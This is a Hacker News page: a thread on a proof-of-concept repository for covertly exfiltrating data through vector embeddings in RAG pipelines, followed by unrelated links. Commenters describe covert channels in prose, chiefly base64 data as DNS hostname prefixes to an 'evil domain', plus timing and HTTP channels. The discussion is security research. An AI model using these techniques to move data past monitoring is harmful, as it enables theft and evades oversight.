frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

Open in hackernews

VectorSmuggle: Covertly Exfiltrate Data in Embeddings

https://github.com/jaschadub/VectorSmuggle
33•smugglereal•1d ago

Comments

smugglereal•1d ago
A comprehensive proof-of-concept demonstrating sophisticated vector-based data exfiltration techniques in AI/ML environments. This educational security research project illustrates potential risks in RAG systems and provides tools for defensive analysis.
acmiyaguchi•1d ago
The idea of using stenographic techniques to exfiltrate data is interesting, but I don't quite follow the general method outlined in the repository -- either through the generated documentation or code. The threat model and case studies seem contrived. I find it hard to believe that folks would expose data via RAG that they wouldn't want users of the underlying system to be privy to.

There's too much fluff here to be useful. I imagine having something that is concise and concrete would make it more appealing to others. But as-is, it's missing a good technical summary and demonstration.

smugglereal•1d ago
Thanks for the feedback!

It's less about the RAG exposing new data to a regular user, and more about using the vector pipeline as a covert channel. The idea is to sneak out data the attacker already can access, but in a way that might bypass traditional DLP looking at emails, USBs, etc.

The "fluff" is largely educational material, as the project is for research and learning. For a concrete technical demonstration, the scripts/embed.py and scripts/query.py scripts are the core, and the docs/guides/quick_start.md tries to offer a direct path to seeing it in action.

Hope that helps! Will add a video demo soon.

anonymousiam•1d ago
Well over a decade ago, I recall learning about a covert data exfiltration method that could bypass firewalls by using DNS lookups. The payload would be a base64 hostname prefix attached to an evil domain. Adding a time stamp to the prefix data would guarantee uniqueness, and get around local caching DNS servers.
DrScientist•23h ago
Yep - bottom line you just use a protocol you know the firewall won't/can't block.

In theory you don't even need anything in the payload - you could put information in the timing of the DNS requests a la morse code....

HTTP is the obvious other one - with much more options for somebody to exfiltrate data - you can think of ways where you don't even need an evil domain.

For example - you could exfilrate data via hackernews comments!

As far as I can see, the only thing you can do in the end is to make it harder to do easily, and then monitor unusual activity - and hope that is enough to stop large scale exfiltration, as small scale is impossible to stop.

stephantul•1d ago
Literal attack vectors

MimeTypeCore – All the MIME/file extension pairs you will ever need

https://github.com/lofcz/MimeTypeCore
1•lofcz•27s ago•0 comments

Plans you're not supposed to talk about

https://dynomight.net/plans/
1•sebg•7m ago•0 comments

HPE Uses AI to Drive the Business, Which Is Increasingly AI

https://www.nextplatform.com/2025/06/04/hpe-uses-ai-to-drive-the-business-which-is-increasingly-ai/
1•rbanffy•9m ago•0 comments

Endangered classic Mac plastic color returns as 3D-printer filament

https://arstechnica.com/apple/2025/06/new-filament-lets-you-3d-print-parts-in-authentic-1980s-apple-computer-color/
1•rbanffy•10m ago•0 comments

Show HN: Camus – The World's First Truly Useless AI Agent

https://www.camus.im
1•jinshang•11m ago•0 comments

Magic Namerefs

https://gist.github.com/izabera/e4717562e20eb6cfb6e05f8019883efb
1•todsacerdoti•12m ago•0 comments

Commanding Your Claude Code Army

https://steipete.me/posts/2025/commanding-your-claude-code-army
1•ingve•13m ago•0 comments

More than a hundred backdoored malware repos traced to single GitHub user

https://www.theregister.com/2025/06/05/backdoored_malware_repos/
1•Brajeshwar•15m ago•0 comments

WaveGuessr – GeoGuessr for Waves

https://waveguessr.com/
3•leratdemaree•18m ago•3 comments

The Qwen3 Embedding Model

https://huggingface.co/Qwen/Qwen3-Embedding-0.6B
1•sadaqabdo•20m ago•0 comments

Z/OS Metal I/O – Making Developers' Lives Better

https://makingdeveloperslivesbetter.wordpress.com/2024/09/25/z-os-metal-i-o/
1•rbanffy•23m ago•0 comments

Have LLMs Mastered Geolocation?

https://www.bellingcat.com/resources/how-tos/2025/06/06/have-llms-finally-mastered-geolocation/
2•LichenStone•27m ago•0 comments

A Proposed Mechanism for Me/CFS Invoking Macrophage FcγRI and Interferon Gamma

https://www.qeios.com/read/8GI3CT/pdf
1•bravesoul2•29m ago•0 comments

Freight rail fueled a new luxury overnight train startup

https://www.freightwaves.com/news/how-freight-rail-fueled-a-new-luxury-overnight-train-startup
1•Ozarkian•34m ago•0 comments

The bromance is over – no one will miss it (German)

https://www.surplusmagazin.de/bromance-elon-musk-donald-trump-doge-streit/
1•doener•39m ago•0 comments

FL Woman Fined $165K for Trivial Code Violations Takes Case to FL Supreme Court

https://reason.com/2025/06/05/florida-woman-fined-165000-for-trivial-code-violations-takes-her-case-to-the-florida-supreme-court/
2•fortran77•43m ago•1 comments

Using Generative AI to Create a Digital Doppelgänger

https://rishimodha.substack.com/p/using-generative-ai-to-create-a-digital
1•n9com•45m ago•0 comments

From Endeavouros to Pop!_OS

https://aumont.fr/posts/From-Endeavouros-to-Pop_OS/
1•Torpenn•47m ago•0 comments

AI Agent Friday Finds Post, 2025-06-06

https://sebgnotes.substack.com/p/friday-finds-post-2025-06-06
1•sebg•47m ago•0 comments

A Sketch of Reversible Deterministic Concurrency for Distributed Protocols

https://replica-io.dev/blog/2025/05/30/a-sketch-of-reversible-deterministic-concurrency-for-distributed-protocols
1•sergefdrv•49m ago•0 comments

Faster remainder by multiplication, with applications to compilers and software

https://arxiv.org/abs/1902.01961
1•fanf2•49m ago•0 comments

Ask HN: Anyone else feeling increasingly alienated from the industry?

8•saubeidl•51m ago•3 comments

What do you all think of the latest Apple paper on LLM capabilities? [pdf]

https://ml-site.cdn-apple.com/papers/the-illusion-of-thinking.pdf
2•nrjpoddar•54m ago•0 comments

Want to Create Professional Charts Fast? Try the Free AI Graph Maker

https://aigraphmaker.net/
1•Yuan0918•58m ago•1 comments

Tesseral: Open-source auth infrastructure for B2B SaaS

https://tesseral.com/docs/what-is-tesseral
1•aargh_aargh•1h ago•0 comments

Algebra Unveils Deep Learning – An Invitation to Neuroalgebraic Geometry

https://arxiv.org/abs/2501.18915
2•IdealeZahlen•1h ago•0 comments

I've Soured on Go

https://nickblow.tech/posts/ive-soured-on-go
1•tosh•1h ago•0 comments

Falsehoods Programmers Believe About Aviation

https://flightaware.engineering/falsehoods-programmers-believe-about-aviation/
2•antoviaque•1h ago•0 comments

Dual RTX 5060 Ti 16GB vs. RTX 3090 for Local LLMs

https://www.hardware-corner.net/guides/dual-rtx-5060-ti-16gb-vs-rtx-3090-llm/
2•pietrushnic•1h ago•0 comments

A Programming System (2023)

https://andreyor.st/posts/2023-10-18-a-programming-system/
1•thunderbong•1h ago•0 comments